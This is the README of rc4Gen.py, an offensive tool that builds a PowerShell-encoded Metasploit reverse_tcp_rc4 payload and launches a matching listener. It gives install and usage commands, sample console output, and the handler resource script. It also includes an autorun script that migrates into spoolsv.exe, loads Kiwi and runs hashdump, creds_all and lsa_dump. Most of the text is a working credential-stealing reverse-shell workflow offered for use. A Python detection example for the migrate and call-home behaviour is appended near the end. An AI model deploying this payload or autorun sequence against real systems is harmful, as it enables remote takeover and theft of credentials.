rc4Gen

            __ __    ____                      
           /\ \\ \  /\  _`\                    
 _ __   ___\ \ \\ \ \ \ \L\_\     __    ___    
/\`'__\/'___\ \ \\ \_\ \ \L_L   /'__`\/' _ `\  
\ \ \//\ \__/\ \__ ,__\ \ \/, \/\  __//\ \/\ \ 
 \ \_\\ \____\\/_/\_\_/\ \____/\ \____\ \_\ \_\
  \/_/ \/____/   \/_/   \/___/  \/____/\/_/\/_/


rc4Gen.py v1.10122016
Description: Generates an MSF reverse TCP RC4 payload, encoded in PowerShell, and copies it to the clipboard.
Automatically launches the corresponding MSF Multi/Handler.
The Multi/Handler listener is weaponized to automatically migrate into the spoolsv.exe process, load Kiwi, and run sysinfo, hashdump, creds_all and lsa_dump.
rc4Gen.py supports both command-line parameters and a Wizard-driven menu.
Created by: Nick Sanzotta/@beamr

Installation:

git clone https://github.com/NickSanzotta/rc4Gen.git
cd rc4Gen
python rc4Gen.py --help

Default Values:

If a parameter is not defined, its default value will be chosen.
Default values are listed below.

lport = '443'
rc4Password = 'rc4M4g1c'
verbose = 'off'
listener = 'on'

Usage(CLI):

Usage: python rc4Gen.py --lhost <OPTIONS>
Example: python rc4Gen.py --lhost 10.0.0.1 --lport=445 --pass=Password123 --verbose=on --listener=off

 Tips:
 If LHOST is not defined the Wizard menu will be launched.


 --lhost=<> Defines the local host used for the reverse_tcp_rc4 payload (required on the CLI; if omitted the Wizard is launched).

 --lport=<443> is default. Defines the local port used for the reverse_tcp_rc4 payload.

 --pass=<rc4M4g1c> is default. Defines the RC4PASSWORD used for the reverse_tcp_rc4 payload.

 --verbose=[OFF] is default. Copies the payload to the Clipboard.

 --verbose=[ON] is not default. Prints the payload to STDOUT.

 --listener=[ON] is default. Automatically launches the corresponding MSF Multi/Handler.

 --listener=[OFF] is not default. Does NOT launch the MSF Multi/Handler.
 
 Misc:

 --help <help>		Prints this help menu.

Usage(Wizard):

External IP: 100.255.255.255
Internal IP: 10.37.242.7

You did not specifiy the LHOST, wizard menu has launched:

Enter LHOST for payload[100.255.255.255]:10.37.242.7
ENTERED: "10.37.242.7"

Enter LPORT for payload[443]:
ENTERED: "443"

Enter RC4PASSWORD for payload[rc4M4g1c]:
ENTERED: "rc4M4g1c"

TIP: Verbosity [ON] will print payload to STDOUT.
TIP: Verbosity [OFF] will copy payload to Clipboard.
Verbosity[OFF]:
ENTERED: "OFF"

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 421 (iteration=0)
x86/shikata_ga_nai chosen with final size 421
Payload size: 421 bytes
Saved as: rc4_payload.ps1

Payload Copied to Clipboard:

PAYLOAD: reverse_tcp_rc4
LHOST: 10.37.242.7
LPORT: 443
RC4PASSWORD: rc4M4g1c
TIP: Listener [ON] will automagically launch a MSF listener.
listener[ON]:
ENTERED: "ON"

[*] Processing rc4_listener.rc for ERB directives.
resource (rc4_listener.rc)> use multi/handler
resource (rc4_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcp_rc4
PAYLOAD => windows/meterpreter/reverse_tcp_rc4
resource (rc4_listener.rc)> set LHOST 10.37.242.7
LHOST => 10.37.242.7
resource (rc4_listener.rc)> set LPORT 443
LPORT => 443
resource (rc4_listener.rc)> set Rc4PASSWORD rc4M4g1c
Rc4PASSWORD => rc4M4g1c
resource (rc4_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (rc4_listener.rc)> set AutoRunScript multi_console_command -rcautorun_commands.rc
AutoRunScript => multi_console_command -rcautorun_commands.rc
resource (rc4_listener.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.37.242.7:443 
[*] Starting the payload handler...
msf exploit(handler) > exit
    ...

Autorun Script:

The Multi/Handler listener is weaponized to automatically migrate into the spoolsv.exe process, load Kiwi, and run sysinfo, hashdump, creds_all and lsa_dump.

A file called 'autorun_commands.rc' is created with the following commands:

migrate -N spoolsv.exe
load kiwi
sysinfo
hashdump
creds_all
lsa_dump
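The autorun step above (migrate into spoolsv.exe) and the PowerShell-encoded payload with its default LPORT of 443 leave two host-side artefacts a defender can look for. The following is an added detection-side example, not part of rc4Gen: it runs two checks over Sysmon-style JSON records (EventID 3 network connection, EventID 8 CreateRemoteThread); the field names are simplified and the log lines are constructed here for illustration.

```python
import json
from typing import Iterable, List, Optional

# Constructed sample telemetry with simplified Sysmon field names, one JSON
# record per line (EventID 3 = network connection, 8 = CreateRemoteThread).
SAMPLE_LOG = r"""
{"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Initiated": true, "DestinationPort": 443}
{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Initiated": true, "DestinationPort": 443}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\spoolsv.exe"}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\spoolsv.exe", "TargetImage": "C:\\Windows\\System32\\spoolsv.exe"}
"""

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
SPOOLER = "spoolsv.exe"

def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag(event: dict) -> Optional[str]:
    """Return a finding for one event, or None when it matches neither pattern."""
    eid = event.get("EventID")
    # Check 1: a script host opening an outbound connection (the staged payload calling home).
    if eid == 3 and event.get("Initiated") and basename(event.get("Image", "")) in SCRIPT_HOSTS:
        return (f"{basename(event['Image'])} initiated outbound TCP to port "
                f"{event.get('DestinationPort')} (script host calling home)")
    # Check 2: a foreign process creating a thread in the print spooler (the migrate step).
    if eid == 8 and basename(event.get("TargetImage", "")) == SPOOLER \
            and basename(event.get("SourceImage", "")) != SPOOLER:
        return (f"{basename(event['SourceImage'])} created a remote thread in {SPOOLER} "
                f"(consistent with a migrate into the print spooler)")
    return None

def analyse(lines: Iterable[str]) -> List[str]:
    """Run both checks over JSON log lines, skipping blank or malformed ones."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = flag(event)
        if finding:
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print("[!]", f)
```

Spooler self-threads and browser traffic on 443 pass through unflagged, so the two constructed PowerShell events are the only hits.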

To Do:

Add an ON/OFF toggle for the autorun script.
